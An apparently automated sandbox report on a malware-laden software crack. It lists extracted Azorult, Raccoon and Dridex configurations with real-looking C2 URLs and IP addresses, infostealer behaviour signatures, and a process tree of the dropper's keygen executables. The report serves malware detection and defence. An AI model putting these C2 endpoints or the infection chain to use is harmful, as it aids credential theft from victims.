Resubmissions

10-04-2021 05:28

210410-642g16c6y6 10

09-04-2021 16:57

210409-a3zwd3zjvx 10

09-04-2021 05:30

210409-4qr2p4p1m6 10

Analysis

  • max time kernel
    1780s
  • max time network
    1800s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-04-2021 05:30

General

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

a6bfe7e504db71e25642b830fd9b2c4366cf882a

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

dridex

Botnet

10111

C2

131.100.24.231:443

188.165.17.91:8443

185.148.169.10:2303

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Detected facebook phishing page
  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Dridex Loader 2 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SetWindowsHookEx 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:472
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:844
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2316
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/30f8668638112r4p2203.html
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1640
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef65e6e00,0x7fef65e6e10,0x7fef65e6e20
        2⤵
          PID:1232
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1080 /prefetch:2
          2⤵
            PID:1676
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1248 /prefetch:8
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1544
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1928 /prefetch:1
            2⤵
              PID:1828
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:1
              2⤵
                PID:924
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2372 /prefetch:1
                2⤵
                  PID:636
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2404 /prefetch:1
                  2⤵
                    PID:1188
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1
                    2⤵
                      PID:1460
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2504 /prefetch:1
                      2⤵
                        PID:1476
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3180 /prefetch:8
                        2⤵
                          PID:2136
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3252 /prefetch:2
                          2⤵
                            PID:2440
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4364 /prefetch:8
                            2⤵
                              PID:2780
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:8
                              2⤵
                                PID:2836
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3648 /prefetch:8
                                2⤵
                                  PID:2928
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4200 /prefetch:8
                                  2⤵
                                    PID:2976
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:8
                                    2⤵
                                      PID:3024
                                    • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                                      "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
                                      2⤵
                                        PID:3044
                                        • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                                          "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13fcb7740,0x13fcb7750,0x13fcb7760
                                          3⤵
                                            PID:3060
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4188 /prefetch:8
                                          2⤵
                                            PID:2160
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3640 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2076
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4208 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:324
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4508 /prefetch:8
                                            2⤵
                                              PID:524
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4292 /prefetch:8
                                              2⤵
                                                PID:2068
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4364 /prefetch:8
                                                2⤵
                                                  PID:2184
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4048 /prefetch:8
                                                  2⤵
                                                    PID:2896
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4740 /prefetch:8
                                                    2⤵
                                                      PID:2948
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:8
                                                      2⤵
                                                        PID:3016
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4044 /prefetch:8
                                                        2⤵
                                                          PID:2252
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4684 /prefetch:8
                                                          2⤵
                                                            PID:2248
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:8
                                                            2⤵
                                                              PID:1628
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:8
                                                              2⤵
                                                                PID:2312
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3940 /prefetch:8
                                                                2⤵
                                                                  PID:2420
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=956 /prefetch:8
                                                                  2⤵
                                                                    PID:2652
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:8
                                                                    2⤵
                                                                      PID:2800
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 /prefetch:8
                                                                      2⤵
                                                                        PID:2792
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1148 /prefetch:8
                                                                        2⤵
                                                                          PID:1228
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4260 /prefetch:8
                                                                          2⤵
                                                                            PID:2424
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
                                                                            2⤵
                                                                              PID:2060
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:8
                                                                              2⤵
                                                                                PID:2212
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=596 /prefetch:8
                                                                                2⤵
                                                                                  PID:2184
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4280 /prefetch:8
                                                                                  2⤵
                                                                                    PID:2960
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2984
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1720 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2980
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4288 /prefetch:8
                                                                                        2⤵
                                                                                          PID:1688
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4064 /prefetch:8
                                                                                          2⤵
                                                                                            PID:2252
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=980 /prefetch:8
                                                                                            2⤵
                                                                                              PID:1052
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
                                                                                              2⤵
                                                                                                PID:2328
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=980 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:2320
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3684 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:2616
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4204 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:2176
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3688 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:2808
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:2788
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3752 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:2872
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:1228
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3692 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:1136
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3696 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:2188
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1004,11598172721954668722,2779968637209867771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3628 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:2980
                                                                                                              • C:\Windows\system32\AUDIODG.EXE
                                                                                                                C:\Windows\system32\AUDIODG.EXE 0x2f4
                                                                                                                1⤵
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2960
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.crack.zip\Wondershare.Dr.fone.For.5.5.0.crack.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.crack.zip\Wondershare.Dr.fone.For.5.5.0.crack.exe"
                                                                                                                1⤵
                                                                                                                  PID:1792
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                    2⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:2216
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                      keygen-pr.exe -p83fsase3Ge
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:2576
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:1056
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:876
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                      keygen-step-1.exe
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:1920
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                      keygen-step-2.exe
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Modifies system certificate store
                                                                                                                      PID:1016
                                                                                                                      • C:\Users\Admin\AppData\Roaming\E3A5.tmp.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\E3A5.tmp.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:2236
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
